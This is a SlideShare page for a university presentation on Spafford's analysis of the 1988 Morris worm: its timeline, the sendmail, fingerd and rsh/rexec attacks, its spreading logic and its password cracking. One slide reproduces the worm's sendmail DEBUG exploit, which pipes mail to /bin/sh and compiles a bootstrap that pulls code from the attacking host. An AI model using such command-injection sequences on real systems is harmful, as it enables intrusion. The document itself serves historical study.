SlideShare a Scribd company logo

bakalov.ppt

Download as PPT, PDF
U
utube3805

The document provides an overview of the 1988 Internet worm, including: - How it exploited vulnerabilities in sendmail, fingerd, and rsh/rexec to spread. - Its architecture, including population control mechanisms, password cracking, and infection procedures. - Current internet worms continue to pose threats by spreading malware via vulnerabilities in services like IIS, Apache, and FTP daemons.

Internet
1 of 29
Eugene H. Spafford, "The Internet Worm Program: An Analysis" Presented by Petko Bakalov University of California - Riverside pbakalov@cs.ucr.edu
Roadmap • Introduction • Worm Description – Security Holes Exploited – Design of the worm • Proposed defense • Current state • Discussion
Resent e-mail Subject: [Staff] URGENT - Email Mass Mailing Virus hitting UCR Date: Mon, 26 Jan 2004 16:04:48 -0800 From: Phyllis Bruce <phyllis.bruce@ucr.edu> To: staff@scotmail.ucr.edu To All Staff: Urgent - a mass mailing worm has hit the internet today as many of you may now know, the name of it according to McAfee is W32/Mydoom@MM. Currently, McAfee AntiVirus has detected the type of virus threat, here is the information we have learned so far:
Definition - What is Worm • Self propagating/replicating code that uses infected host as a platform to attack other systems • Can spread fast causing epidemic-like outbreaks that wreak havoc on networks and hosts
Black Thursday - Chronology I 11/2:18:00 (approx.) This date and time of worm files found on prep.ai.mit.edu, a VAX 11/750 at the MIT Artificial Intelligence Lab. It is supposed that the attack began from here 11/2:18:24 rand.org at Rand Corp. in Santa Monica - First known West Coast infection. 11/2: 20:49 cs.utah.edu is infected. The machine is VAX 8600. Several hours after the infection the load average of the server reached 16. Typically at this time it is between 0.5 and 2.
Black Thursday - Chronology II 11/2: 23:28 Peter Yee at NASA Ames Research Center suggests turning off telnet, ftp, finger, rsh and SMTP services. 11/3: 02:54 Keith Bostic sends a fix for sendmail to the newsgroup comp.bugs.4bsd.ucb-fixes and to the TCP-IP mailing list. 11/3 :15:00 (approx.) The team at MIT Athena calls Berkeley with an example of how the finger server bug works. 11/4: 12:36 MIT and Berkeley have completely disassembled the worm
Security Holes Exploited The basic object of the worm is to get a shell on another machine so it can reproduce further. Tree ways of attack: sendmail. fingerd. rsh/rexec.
Sendmail attack - I Door resulted from two distinct 'features' that, although innocent by themselves, were deadly when combined. sendmail permits mail to be delivered to processes instead of mailbox files sendmail is compiled with the DEBUG flag, and it permits sender to pass in a command sequence instead of a user name for a recipient. The worm opens a TCP connection to victim's sendmail, invokes debug mode, and sends a RCPT TO that requests its data be piped through a shell. That data, a shell script (first-stage bootstrap) creates and compiles temporary second-stage bootstrap - C program. This C program sucks the object files from the attacking host and compiles them.
Sendmail attack - II debug mail from: </dev/null> rcpt to: <"|sed -e ’1,/^$/’d | /bin/sh ; exit 0"> data cd /usr/tmp cat > x14481910.c <<’EOF’ [text of vector program—second-stage bootstrap ] EOF cc -o x14481910 x14481910.c;x14481910 128.32.134.16 32341 8712440; rm -f x14481910 x14481910.c . quit
Finger attack - I Finger reports information about a user on a host - it reads a request from the originating host, then runs the local finger program with the request as an argument and ships the output back. The finger server reads the remote request with gets() which does not check for overflow of the buffer. The worm supplies the finger server with a request that is bigger than the buffer and in this way write over the server's stack frame for the main routine. On a VAX, the worm knew how much further from the stack it had to clobber to get command to be executed "/usr/ucb/finger", which it replaced with the command "/bin/sh" . So instead of the finger command being executed, a shell was started.
Finger attack - II
Rsh rexec attack Rsh and rexec are network services which offer remote command interpreters. Rexec uses password authentication; rsh relies on a "privileged" originating port and permissions files. The worm exploit two types of vulnerabilities likelihood that both accounts on the remote and on the local machines will have the same password likelihood that a remote account will include the local host in its rsh permissions files There are some files in the local host exploited by the worm forward - contains an address to which mail is forwarded rhosts - list of hosts on those hosts which are granted permission to access the local machine with rsh
Worm architecture - doit Setup state of the worm initializations change its name initialize the worm's list of network interfaces defense turns off core dumps zeroes out its argument list cleanup arranges to die when remote connections fail removes each file after it reads it. Call doit function
Worm architecture - doit doit() { seed the random number generator with the time attack hosts: gateways, local nets, remote nets checkother(); send message(); for (;;) { cracksome(); other_sleep(30); cracksome(); change our process ID attack hosts: gateways, known hosts,local nets other_sleep(120); if (12 hours have passed) reset hosts table if (pleasequit && nextw > 10) exit(0); } }
Worm architecture - doit checkother() - check for another worm already on the local machine. send_message() - odd routine intended to cause 1 in 15 copies to send a message to a port on the host ernie.berkeley.edu cracksome() - password cracking other_sleep() - communication with another worm If 12 hours have passed and the worm is still alive it reinitializes its table of hosts At the end of the main loop the worm checks to see if it is scheduled to die as a result of its population control features, and if it is, and if it has done a sufficient amount of work cracking passwords, it exits.
Worm architecture - population control The worm contains a mechanism that was designed to limit the number of copies of the worm running on a given system. This system clearly does not prevent a system from being overloaded The worm uses a client-and-server technique to control the number of copies executing on the current machine. It uses TCP port 23357 on the local host. In the beginning the worm tries to connect to this port. If it is not successful this means that there is no other worm on the same machine. The worm becomes server. Otherwise there is another worm in this machine.
Worm architecture - population control If there is another worm client exchanges magic numbers with the server as a trivial form of authentication and the client and the server roll dice to see who gets to survive The loser sets a flag pleasequit in order to exit at the bottom of the main loop. One culprit is the 1 in 7 test in checkother(): worms that skip the client phase become immortal, and thus don't risk being eliminated by a roll of the dice. Thus the worm finishes the population game in one of three states: scheduled to die after some time, with pleasequit set; running as a server, with the possibility of losing the game later immortal, safe from the gamble of population control.
Worm architecture - Choosing new targets One of the characteristics of the worm is that all of its attacks are active - do not depend on user to propagate. There is distinct list of priorities when hunting for hosts Its favorite hosts are gateways; the hg() routine tries to infect each of the hosts it believes to be gateways. the worm's next priority is hosts whose names were found in a scan of system files etc/hosts.equiv - contains names of hosts to which the local host grants user permissions without authentication rhosts - which contains names of hosts from which the local host permits remote privileged logins
Worm architecture - Choosing new targets forward files - list hosts to which mail is forwarded from the current host worm starts looking for hosts that aren't recorded in files. hl() checks local networks: it runs through the local host's addresses, masking off the host part and substituting a random value. ha() does the same job for remote hosts, checking alternate addresses of gateways.
Worm architecture - Infection procedure The worm uses two favorite routines when it decides that it wants to infect a host. infect() is used from host scanning routines. This routine first checks that it isn't infecting the local machine, an already infected machine or a machine previously attacked but not successfully infected. It uses "infected" and "immune" states. Then comes a series of attacks: rsh from the account that the worm is running under, finger sendmail.
Worm architecture - Infection procedure The other infection routine is named hul() and it is run from the password cracking code after a password has been guessed. potential remote user name is available from a .forward or .rhosts file If a remote user name is unavailable the worm uses the local user name it contacts the rexec server on the target host and tries to authenticate itself If it can, it proceeds to the bootstrap phase If not - it tries reverse rexec to the host
Worm architecture - Infection procedure Both infect() and hul() use a routine sendworm() - looks for the ll.c bootstrap source file in its objects list uses the makemagic() routine to get a communication stream endpoint (a socket), a random network port number to rendezvous at, and a magic number for authentication. Sends across the bootstrap source. The bootstrap source is compiled and run on the remote system When a connection is successful, the worm ships all of its files across It pauses four seconds to let a command interpreter start on the remote side, then it issues commands to create a new worm.
Worm architecture - Password cracking Guessing passwords. The worm's password guessing is driven by a little 4-state machine. The first state gathers password data, while the remaining states represent increasingly less likely sources of potential passwords. crack_0() collect information about hosts and accounts. crack_1() looks for trivially broken passwords (the account name, the account name concatenated with itself, the first name ) crack_2(). In this state the worm compares a list of favorite passwords crack_3(). It opens the UNIX online dictionary /usr/dict/words and goes through it one word at a time.
Worm architecture - Password cracking Faster password encryption. The worm's crypt() algorithm appears to be a compromise between time and space. Advantages of the worm encryption : worm's algorithm to use bit-field and shift operations on the password data precomputing shifts and masks The biggest performance improvement comes as a result of combining permutations: the worm uses expanded arrays which are indexed by groups of bits rather than the single bits used by the standard algorithm
Worm architecture - Password cracking Result: The worm's version of the UNIX crypt() routine ran more than 9 times faster than the standard version when it was tested VAX 8600. While the standard crypt() takes 54 seconds to encrypt 271 passwords on our 8600 (the number of passwords actually contained in our password file), the worm's crypt() takes less than 6 seconds.
Worm architecture - Defense How can system administrators defend against fast implementations of crypt()? One suggestion that has been introduced is the idea of shadow password files. In this scheme, the encrypted passwords are hidden rather than public, forcing a cracker to either break a privileged account use the host's CPU and (slow) encryption algorithm to attack, with the added danger that password test requests could be logged and password cracking discovered.
Current status Purposes Vary: •Denial of Service: CodeRed •Backdoor: CodeRedII left the system up for grabs •Replace/Remail: Nimda replaced common file types •Nothing: Kournikova spread to everyone you know •Anything: arbitrary code means arbitrary code An Ongoing Threat •Windows: • CodeRed (IIS), CodeRedII(IIS), Klez(OL), ILoveYou(OL), Magistr(OL), AnnaKournikova(OL), SirCam... •Linux: • Slapper (Apache), Ramen(wu-ftpd+), Lion(bind)...
References The Internet Worm Program: An Analysis Eugene H. Spafford Remembering the Net Crash of ‘88 Bob Sullivan A Tour of the Worm Donn Seeley A report on internet worm Bob Page
Discussion •Why the worm reproduces so quickly that it could swamp machine?

Recommended

DDoS Attacks
DDoS AttacksDDoS Attacks
DDoS Attacks
Jignesh Patel
 
Aw36294299
Aw36294299Aw36294299
Aw36294299
IJERA Editor
 
Presentation Prepared By: Mohamad Almajali
Presentation Prepared By: Mohamad AlmajaliPresentation Prepared By: Mohamad Almajali
Presentation Prepared By: Mohamad Almajali
webhostingguy
 
RAT - Kill or Get Killed! by Karan Bansal
RAT - Kill or Get Killed! by Karan BansalRAT - Kill or Get Killed! by Karan Bansal
RAT - Kill or Get Killed! by Karan Bansal
OWASP Delhi
 
Security and ethics
Security and ethicsSecurity and ethics
Security and ethics
Argie242424
 
Finding Diversity In Remote Code Injection Exploits
Finding Diversity In Remote Code Injection ExploitsFinding Diversity In Remote Code Injection Exploits
Finding Diversity In Remote Code Injection Exploits
amiable_indian
 
Picking apart the morris worm
Picking apart the morris wormPicking apart the morris worm
Picking apart the morris worm
Jayakrishna Menon
 
Introduction to trojans and backdoors
Introduction to trojans and backdoorsIntroduction to trojans and backdoors
Introduction to trojans and backdoors
jibinmanjooran
 

Recommended

DDoS Attacks
DDoS AttacksDDoS Attacks
DDoS Attacks
Jignesh Patel
 
Aw36294299
Aw36294299Aw36294299
Aw36294299
IJERA Editor
 
Presentation Prepared By: Mohamad Almajali
Presentation Prepared By: Mohamad AlmajaliPresentation Prepared By: Mohamad Almajali
Presentation Prepared By: Mohamad Almajali
webhostingguy
 
RAT - Kill or Get Killed! by Karan Bansal
RAT - Kill or Get Killed! by Karan BansalRAT - Kill or Get Killed! by Karan Bansal
RAT - Kill or Get Killed! by Karan Bansal
OWASP Delhi
 
Security and ethics
Security and ethicsSecurity and ethics
Security and ethics
Argie242424
 
Finding Diversity In Remote Code Injection Exploits
Finding Diversity In Remote Code Injection ExploitsFinding Diversity In Remote Code Injection Exploits
Finding Diversity In Remote Code Injection Exploits
amiable_indian
 
Picking apart the morris worm
Picking apart the morris wormPicking apart the morris worm
Picking apart the morris worm
Jayakrishna Menon
 
Introduction to trojans and backdoors
Introduction to trojans and backdoorsIntroduction to trojans and backdoors
Introduction to trojans and backdoors
jibinmanjooran
 
1Buttercup On Network-based Detection of Polymorphic B.docx
1Buttercup On Network-based Detection of Polymorphic B.docx 1Buttercup On Network-based Detection of Polymorphic B.docx
1Buttercup On Network-based Detection of Polymorphic B.docx
aryan532920
 
Blast off!
Blast off!Blast off!
Blast off!
UltraUploader
 
Intruders and Viruses in Network Security NS9
Intruders and Viruses in Network Security NS9Intruders and Viruses in Network Security NS9
Intruders and Viruses in Network Security NS9
koolkampus
 
Ericas-Security-Plus-Study-Guide
Ericas-Security-Plus-Study-GuideEricas-Security-Plus-Study-Guide
Ericas-Security-Plus-Study-Guide
Erica StJohn
 
Theoretical practice 3
Theoretical practice 3Theoretical practice 3
Theoretical practice 3
Erick Treviño
 
DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....
DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....
DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....
Shah Sheikh
 
security.pdf
security.pdfsecurity.pdf
security.pdf
MattMarino13
 
Cyber Security and Ethical hacking 16
Cyber Security and Ethical hacking 16Cyber Security and Ethical hacking 16
Cyber Security and Ethical hacking 16
Mehedi Hasan
 
2071
20712071
2071
Brave Sithu
 
Ids 009 network attacks
Ids 009 network attacksIds 009 network attacks
Ids 009 network attacks
jyoti_lakhani
 
Computer worm
Computer wormComputer worm
Computer worm
zelkan19
 
Computer worm
Computer wormComputer worm
Computer worm
zelkan19
 
Ethical Hacking - sniffing
Ethical Hacking - sniffingEthical Hacking - sniffing
Ethical Hacking - sniffing
Bhavya Chawla
 
Internet security
Internet securityInternet security
Internet security
gOhElprashanT
 
Internet security
Internet securityInternet security
Internet security
gohel
 
Cryptography and Network security # Lecture 3
Cryptography and Network security # Lecture 3Cryptography and Network security # Lecture 3
Cryptography and Network security # Lecture 3
Kabul Education University
 
Final malacious softwares
Final malacious softwaresFinal malacious softwares
Final malacious softwares
Mirza Adnan Baig
 
Enabling Worm and Malware Investigation Using Virtualization
Enabling Worm and Malware Investigation Using VirtualizationEnabling Worm and Malware Investigation Using Virtualization
Enabling Worm and Malware Investigation Using Virtualization
amiable_indian
 
Spreading Technique used by Malware
Spreading Technique used by MalwareSpreading Technique used by Malware
Spreading Technique used by Malware
Abhishek Singh
 
How hackers attack networks
How hackers attack networksHow hackers attack networks
How hackers attack networks
Adeel Javaid
 
Honeypots Unveiled: Proactive Defense Tactics for Cyber Security, Phoenix Sum...
Honeypots Unveiled: Proactive Defense Tactics for Cyber Security, Phoenix Sum...Honeypots Unveiled: Proactive Defense Tactics for Cyber Security, Phoenix Sum...
Honeypots Unveiled: Proactive Defense Tactics for Cyber Security, Phoenix Sum...
APNIC
 
Bengaluru Dreamin' 24 - Personal Branding
Bengaluru Dreamin' 24 - Personal BrandingBengaluru Dreamin' 24 - Personal Branding
Bengaluru Dreamin' 24 - Personal Branding
Tarandeep Singh
 

More Related Content

Similar to bakalov.ppt

1Buttercup On Network-based Detection of Polymorphic B.docx
1Buttercup On Network-based Detection of Polymorphic B.docx 1Buttercup On Network-based Detection of Polymorphic B.docx
1Buttercup On Network-based Detection of Polymorphic B.docx
aryan532920
 
Blast off!
Blast off!Blast off!
Blast off!
UltraUploader
 
Intruders and Viruses in Network Security NS9
Intruders and Viruses in Network Security NS9Intruders and Viruses in Network Security NS9
Intruders and Viruses in Network Security NS9
koolkampus
 
Ericas-Security-Plus-Study-Guide
Ericas-Security-Plus-Study-GuideEricas-Security-Plus-Study-Guide
Ericas-Security-Plus-Study-Guide
Erica StJohn
 
Theoretical practice 3
Theoretical practice 3Theoretical practice 3
Theoretical practice 3
Erick Treviño
 
DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....
DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....
DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....
Shah Sheikh
 
security.pdf
security.pdfsecurity.pdf
security.pdf
MattMarino13
 
Cyber Security and Ethical hacking 16
Cyber Security and Ethical hacking 16Cyber Security and Ethical hacking 16
Cyber Security and Ethical hacking 16
Mehedi Hasan
 
2071
20712071
2071
Brave Sithu
 
Ids 009 network attacks
Ids 009 network attacksIds 009 network attacks
Ids 009 network attacks
jyoti_lakhani
 
Computer worm
Computer wormComputer worm
Computer worm
zelkan19
 
Computer worm
Computer wormComputer worm
Computer worm
zelkan19
 
Ethical Hacking - sniffing
Ethical Hacking - sniffingEthical Hacking - sniffing
Ethical Hacking - sniffing
Bhavya Chawla
 
Internet security
Internet securityInternet security
Internet security
gOhElprashanT
 
Internet security
Internet securityInternet security
Internet security
gohel
 
Cryptography and Network security # Lecture 3
Cryptography and Network security # Lecture 3Cryptography and Network security # Lecture 3
Cryptography and Network security # Lecture 3
Kabul Education University
 
Final malacious softwares
Final malacious softwaresFinal malacious softwares
Final malacious softwares
Mirza Adnan Baig
 
Enabling Worm and Malware Investigation Using Virtualization
Enabling Worm and Malware Investigation Using VirtualizationEnabling Worm and Malware Investigation Using Virtualization
Enabling Worm and Malware Investigation Using Virtualization
amiable_indian
 
Spreading Technique used by Malware
Spreading Technique used by MalwareSpreading Technique used by Malware
Spreading Technique used by Malware
Abhishek Singh
 
How hackers attack networks
How hackers attack networksHow hackers attack networks
How hackers attack networks
Adeel Javaid
 

Similar to bakalov.ppt (20)

1Buttercup On Network-based Detection of Polymorphic B.docx
1Buttercup On Network-based Detection of Polymorphic B.docx 1Buttercup On Network-based Detection of Polymorphic B.docx
1Buttercup On Network-based Detection of Polymorphic B.docx
 
Blast off!
Blast off!Blast off!
Blast off!
 
Intruders and Viruses in Network Security NS9
Intruders and Viruses in Network Security NS9Intruders and Viruses in Network Security NS9
Intruders and Viruses in Network Security NS9
 
Ericas-Security-Plus-Study-Guide
Ericas-Security-Plus-Study-GuideEricas-Security-Plus-Study-Guide
Ericas-Security-Plus-Study-Guide
 
Theoretical practice 3
Theoretical practice 3Theoretical practice 3
Theoretical practice 3
 
DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....
DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....
DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....
 
security.pdf
security.pdfsecurity.pdf
security.pdf
 
Cyber Security and Ethical hacking 16
Cyber Security and Ethical hacking 16Cyber Security and Ethical hacking 16
Cyber Security and Ethical hacking 16
 
2071
20712071
2071
 
Ids 009 network attacks
Ids 009 network attacksIds 009 network attacks
Ids 009 network attacks
 
Computer worm
Computer wormComputer worm
Computer worm
 
Computer worm
Computer wormComputer worm
Computer worm
 
Ethical Hacking - sniffing
Ethical Hacking - sniffingEthical Hacking - sniffing
Ethical Hacking - sniffing
 
Internet security
Internet securityInternet security
Internet security
 
Internet security
Internet securityInternet security
Internet security
 
Cryptography and Network security # Lecture 3
Cryptography and Network security # Lecture 3Cryptography and Network security # Lecture 3
Cryptography and Network security # Lecture 3
 
Final malacious softwares
Final malacious softwaresFinal malacious softwares
Final malacious softwares
 
Enabling Worm and Malware Investigation Using Virtualization
Enabling Worm and Malware Investigation Using VirtualizationEnabling Worm and Malware Investigation Using Virtualization
Enabling Worm and Malware Investigation Using Virtualization
 
Spreading Technique used by Malware
Spreading Technique used by MalwareSpreading Technique used by Malware
Spreading Technique used by Malware
 
How hackers attack networks
How hackers attack networksHow hackers attack networks
How hackers attack networks
 

Recently uploaded

Honeypots Unveiled: Proactive Defense Tactics for Cyber Security, Phoenix Sum...
Honeypots Unveiled: Proactive Defense Tactics for Cyber Security, Phoenix Sum...Honeypots Unveiled: Proactive Defense Tactics for Cyber Security, Phoenix Sum...
Honeypots Unveiled: Proactive Defense Tactics for Cyber Security, Phoenix Sum...
APNIC
 
Bengaluru Dreamin' 24 - Personal Branding
Bengaluru Dreamin' 24 - Personal BrandingBengaluru Dreamin' 24 - Personal Branding
Bengaluru Dreamin' 24 - Personal Branding
Tarandeep Singh
 
HijackLoader Evolution: Interactive Process Hollowing
HijackLoader Evolution: Interactive Process HollowingHijackLoader Evolution: Interactive Process Hollowing
HijackLoader Evolution: Interactive Process Hollowing
Donato Onofri
 
How to make a complaint to the police for Social Media Fraud.pdf
How to make a complaint to the police for Social Media Fraud.pdfHow to make a complaint to the police for Social Media Fraud.pdf
How to make a complaint to the police for Social Media Fraud.pdf
Infosec train
 
快速办理(Vic毕业证书)惠灵顿维多利亚大学毕业证完成信一模一样
快速办理(Vic毕业证书)惠灵顿维多利亚大学毕业证完成信一模一样快速办理(Vic毕业证书)惠灵顿维多利亚大学毕业证完成信一模一样
快速办理(Vic毕业证书)惠灵顿维多利亚大学毕业证完成信一模一样
3a0sd7z3
 
快速办理(新加坡SMU毕业证书)新加坡管理大学毕业证文凭证书一模一样
快速办理(新加坡SMU毕业证书)新加坡管理大学毕业证文凭证书一模一样快速办理(新加坡SMU毕业证书)新加坡管理大学毕业证文凭证书一模一样
快速办理(新加坡SMU毕业证书)新加坡管理大学毕业证文凭证书一模一样
3a0sd7z3
 
怎么办理(umiami毕业证书)美国迈阿密大学毕业证文凭证书实拍图原版一模一样
怎么办理(umiami毕业证书)美国迈阿密大学毕业证文凭证书实拍图原版一模一样怎么办理(umiami毕业证书)美国迈阿密大学毕业证文凭证书实拍图原版一模一样
怎么办理(umiami毕业证书)美国迈阿密大学毕业证文凭证书实拍图原版一模一样
rtunex8r
 
cyber crime.pptx..........................
cyber crime.pptx..........................cyber crime.pptx..........................
cyber crime.pptx..........................
GNAMBIKARAO
 
一比一原版新西兰林肯大学毕业证(Lincoln毕业证书)学历如何办理
一比一原版新西兰林肯大学毕业证(Lincoln毕业证书)学历如何办理一比一原版新西兰林肯大学毕业证(Lincoln毕业证书)学历如何办理
一比一原版新西兰林肯大学毕业证(Lincoln毕业证书)学历如何办理
thezot
 
Securing BGP: Operational Strategies and Best Practices for Network Defenders...
Securing BGP: Operational Strategies and Best Practices for Network Defenders...Securing BGP: Operational Strategies and Best Practices for Network Defenders...
Securing BGP: Operational Strategies and Best Practices for Network Defenders...
APNIC
 
一比一原版(uc毕业证书)加拿大卡尔加里大学毕业证如何办理
一比一原版(uc毕业证书)加拿大卡尔加里大学毕业证如何办理一比一原版(uc毕业证书)加拿大卡尔加里大学毕业证如何办理
一比一原版(uc毕业证书)加拿大卡尔加里大学毕业证如何办理
dtagbe
 

Recently uploaded (11)

Honeypots Unveiled: Proactive Defense Tactics for Cyber Security, Phoenix Sum...
Honeypots Unveiled: Proactive Defense Tactics for Cyber Security, Phoenix Sum...Honeypots Unveiled: Proactive Defense Tactics for Cyber Security, Phoenix Sum...
Honeypots Unveiled: Proactive Defense Tactics for Cyber Security, Phoenix Sum...
 
Bengaluru Dreamin' 24 - Personal Branding
Bengaluru Dreamin' 24 - Personal BrandingBengaluru Dreamin' 24 - Personal Branding
Bengaluru Dreamin' 24 - Personal Branding
 
HijackLoader Evolution: Interactive Process Hollowing
HijackLoader Evolution: Interactive Process HollowingHijackLoader Evolution: Interactive Process Hollowing
HijackLoader Evolution: Interactive Process Hollowing
 
How to make a complaint to the police for Social Media Fraud.pdf
How to make a complaint to the police for Social Media Fraud.pdfHow to make a complaint to the police for Social Media Fraud.pdf
How to make a complaint to the police for Social Media Fraud.pdf
 
快速办理(Vic毕业证书)惠灵顿维多利亚大学毕业证完成信一模一样
快速办理(Vic毕业证书)惠灵顿维多利亚大学毕业证完成信一模一样快速办理(Vic毕业证书)惠灵顿维多利亚大学毕业证完成信一模一样
快速办理(Vic毕业证书)惠灵顿维多利亚大学毕业证完成信一模一样
 
快速办理(新加坡SMU毕业证书)新加坡管理大学毕业证文凭证书一模一样
快速办理(新加坡SMU毕业证书)新加坡管理大学毕业证文凭证书一模一样快速办理(新加坡SMU毕业证书)新加坡管理大学毕业证文凭证书一模一样
快速办理(新加坡SMU毕业证书)新加坡管理大学毕业证文凭证书一模一样
 
怎么办理(umiami毕业证书)美国迈阿密大学毕业证文凭证书实拍图原版一模一样
怎么办理(umiami毕业证书)美国迈阿密大学毕业证文凭证书实拍图原版一模一样怎么办理(umiami毕业证书)美国迈阿密大学毕业证文凭证书实拍图原版一模一样
怎么办理(umiami毕业证书)美国迈阿密大学毕业证文凭证书实拍图原版一模一样
 
cyber crime.pptx..........................
cyber crime.pptx..........................cyber crime.pptx..........................
cyber crime.pptx..........................
 
一比一原版新西兰林肯大学毕业证(Lincoln毕业证书)学历如何办理
一比一原版新西兰林肯大学毕业证(Lincoln毕业证书)学历如何办理一比一原版新西兰林肯大学毕业证(Lincoln毕业证书)学历如何办理
一比一原版新西兰林肯大学毕业证(Lincoln毕业证书)学历如何办理
 
Securing BGP: Operational Strategies and Best Practices for Network Defenders...
Securing BGP: Operational Strategies and Best Practices for Network Defenders...Securing BGP: Operational Strategies and Best Practices for Network Defenders...
Securing BGP: Operational Strategies and Best Practices for Network Defenders...
 
一比一原版(uc毕业证书)加拿大卡尔加里大学毕业证如何办理
一比一原版(uc毕业证书)加拿大卡尔加里大学毕业证如何办理一比一原版(uc毕业证书)加拿大卡尔加里大学毕业证如何办理
一比一原版(uc毕业证书)加拿大卡尔加里大学毕业证如何办理
 

bakalov.ppt

  • 1. Eugene H. Spafford, "The Internet Worm Program: An Analysis" Presented by Petko Bakalov University of California - Riverside pbakalov@cs.ucr.edu
  • 2. Roadmap • Introduction • Worm Description – Security Holes Exploited – Design of the worm • Proposed defense • Current state • Discussion
  • 3. Resent e-mail Subject: [Staff] URGENT - Email Mass Mailing Virus hitting UCR Date: Mon, 26 Jan 2004 16:04:48 -0800 From: Phyllis Bruce <phyllis.bruce@ucr.edu> To: staff@scotmail.ucr.edu To All Staff: Urgent - a mass mailing worm has hit the internet today as many of you may now know, the name of it according to McAfee is W32/Mydoom@MM. Currently, McAfee AntiVirus has detected the type of virus threat, here is the information we have learned so far:
  • 4. Definition - What is Worm • Self propagating/replicating code that uses infected host as a platform to attack other systems • Can spread fast causing epidemic-like outbreaks that wreak havoc on networks and hosts
  • 5. Black Thursday - Chronology I 11/2:18:00 (approx.) This date and time of worm files found on prep.ai.mit.edu, a VAX 11/750 at the MIT Artificial Intelligence Lab. It is supposed that the attack began from here 11/2:18:24 rand.org at Rand Corp. in Santa Monica - First known West Coast infection. 11/2: 20:49 cs.utah.edu is infected. The machine is VAX 8600. Several hours after the infection the load average of the server reached 16. Typically at this time it is between 0.5 and 2.
  • 6. Black Thursday - Chronology II 11/2: 23:28 Peter Yee at NASA Ames Research Center suggests turning off telnet, ftp, finger, rsh and SMTP services. 11/3: 02:54 Keith Bostic sends a fix for sendmail to the newsgroup comp.bugs.4bsd.ucb-fixes and to the TCP-IP mailing list. 11/3 :15:00 (approx.) The team at MIT Athena calls Berkeley with an example of how the finger server bug works. 11/4: 12:36 MIT and Berkeley have completely disassembled the worm
  • 7. Security Holes Exploited The basic object of the worm is to get a shell on another machine so it can reproduce further. Tree ways of attack: sendmail. fingerd. rsh/rexec.
  • 8. Sendmail attack - I Door resulted from two distinct 'features' that, although innocent by themselves, were deadly when combined. sendmail permits mail to be delivered to processes instead of mailbox files sendmail is compiled with the DEBUG flag, and it permits sender to pass in a command sequence instead of a user name for a recipient. The worm opens a TCP connection to victim's sendmail, invokes debug mode, and sends a RCPT TO that requests its data be piped through a shell. That data, a shell script (first-stage bootstrap) creates and compiles temporary second-stage bootstrap - C program. This C program sucks the object files from the attacking host and compiles them.
  • 9. Sendmail attack - II debug mail from: </dev/null> rcpt to: <"|sed -e ’1,/^$/’d | /bin/sh ; exit 0"> data cd /usr/tmp cat > x14481910.c <<’EOF’ [text of vector program—second-stage bootstrap ] EOF cc -o x14481910 x14481910.c;x14481910 128.32.134.16 32341 8712440; rm -f x14481910 x14481910.c . quit
  • 10. Finger attack - I Finger reports information about a user on a host - it reads a request from the originating host, then runs the local finger program with the request as an argument and ships the output back. The finger server reads the remote request with gets() which does not check for overflow of the buffer. The worm supplies the finger server with a request that is bigger than the buffer and in this way write over the server's stack frame for the main routine. On a VAX, the worm knew how much further from the stack it had to clobber to get command to be executed "/usr/ucb/finger", which it replaced with the command "/bin/sh" . So instead of the finger command being executed, a shell was started.
  • 12. Rsh rexec attack Rsh and rexec are network services which offer remote command interpreters. Rexec uses password authentication; rsh relies on a "privileged" originating port and permissions files. The worm exploit two types of vulnerabilities likelihood that both accounts on the remote and on the local machines will have the same password likelihood that a remote account will include the local host in its rsh permissions files There are some files in the local host exploited by the worm forward - contains an address to which mail is forwarded rhosts - list of hosts on those hosts which are granted permission to access the local machine with rsh
  • 13. Worm architecture - doit Setup state of the worm initializations change its name initialize the worm's list of network interfaces defense turns off core dumps zeroes out its argument list cleanup arranges to die when remote connections fail removes each file after it reads it. Call doit function
  • 14. Worm architecture - doit doit() { seed the random number generator with the time attack hosts: gateways, local nets, remote nets checkother(); send message(); for (;;) { cracksome(); other_sleep(30); cracksome(); change our process ID attack hosts: gateways, known hosts,local nets other_sleep(120); if (12 hours have passed) reset hosts table if (pleasequit && nextw > 10) exit(0); } }
  • 15. Worm architecture - doit checkother() - check for another worm already on the local machine. send_message() - odd routine intended to cause 1 in 15 copies to send a message to a port on the host ernie.berkeley.edu cracksome() - password cracking other_sleep() - communication with another worm If 12 hours have passed and the worm is still alive it reinitializes its table of hosts At the end of the main loop the worm checks to see if it is scheduled to die as a result of its population control features, and if it is, and if it has done a sufficient amount of work cracking passwords, it exits.
  • 16. Worm architecture - population control The worm contains a mechanism that was designed to limit the number of copies of the worm running on a given system. This system clearly does not prevent a system from being overloaded The worm uses a client-and-server technique to control the number of copies executing on the current machine. It uses TCP port 23357 on the local host. In the beginning the worm tries to connect to this port. If it is not successful this means that there is no other worm on the same machine. The worm becomes server. Otherwise there is another worm in this machine.
  • 17. Worm architecture - population control If there is another worm client exchanges magic numbers with the server as a trivial form of authentication and the client and the server roll dice to see who gets to survive The loser sets a flag pleasequit in order to exit at the bottom of the main loop. One culprit is the 1 in 7 test in checkother(): worms that skip the client phase become immortal, and thus don't risk being eliminated by a roll of the dice. Thus the worm finishes the population game in one of three states: scheduled to die after some time, with pleasequit set; running as a server, with the possibility of losing the game later immortal, safe from the gamble of population control.
  • 18. Worm architecture - Choosing new targets One of the characteristics of the worm is that all of its attacks are active - do not depend on user to propagate. There is distinct list of priorities when hunting for hosts Its favorite hosts are gateways; the hg() routine tries to infect each of the hosts it believes to be gateways. the worm's next priority is hosts whose names were found in a scan of system files etc/hosts.equiv - contains names of hosts to which the local host grants user permissions without authentication rhosts - which contains names of hosts from which the local host permits remote privileged logins
  • 19. Worm architecture - Choosing new targets forward files - list hosts to which mail is forwarded from the current host worm starts looking for hosts that aren't recorded in files. hl() checks local networks: it runs through the local host's addresses, masking off the host part and substituting a random value. ha() does the same job for remote hosts, checking alternate addresses of gateways.
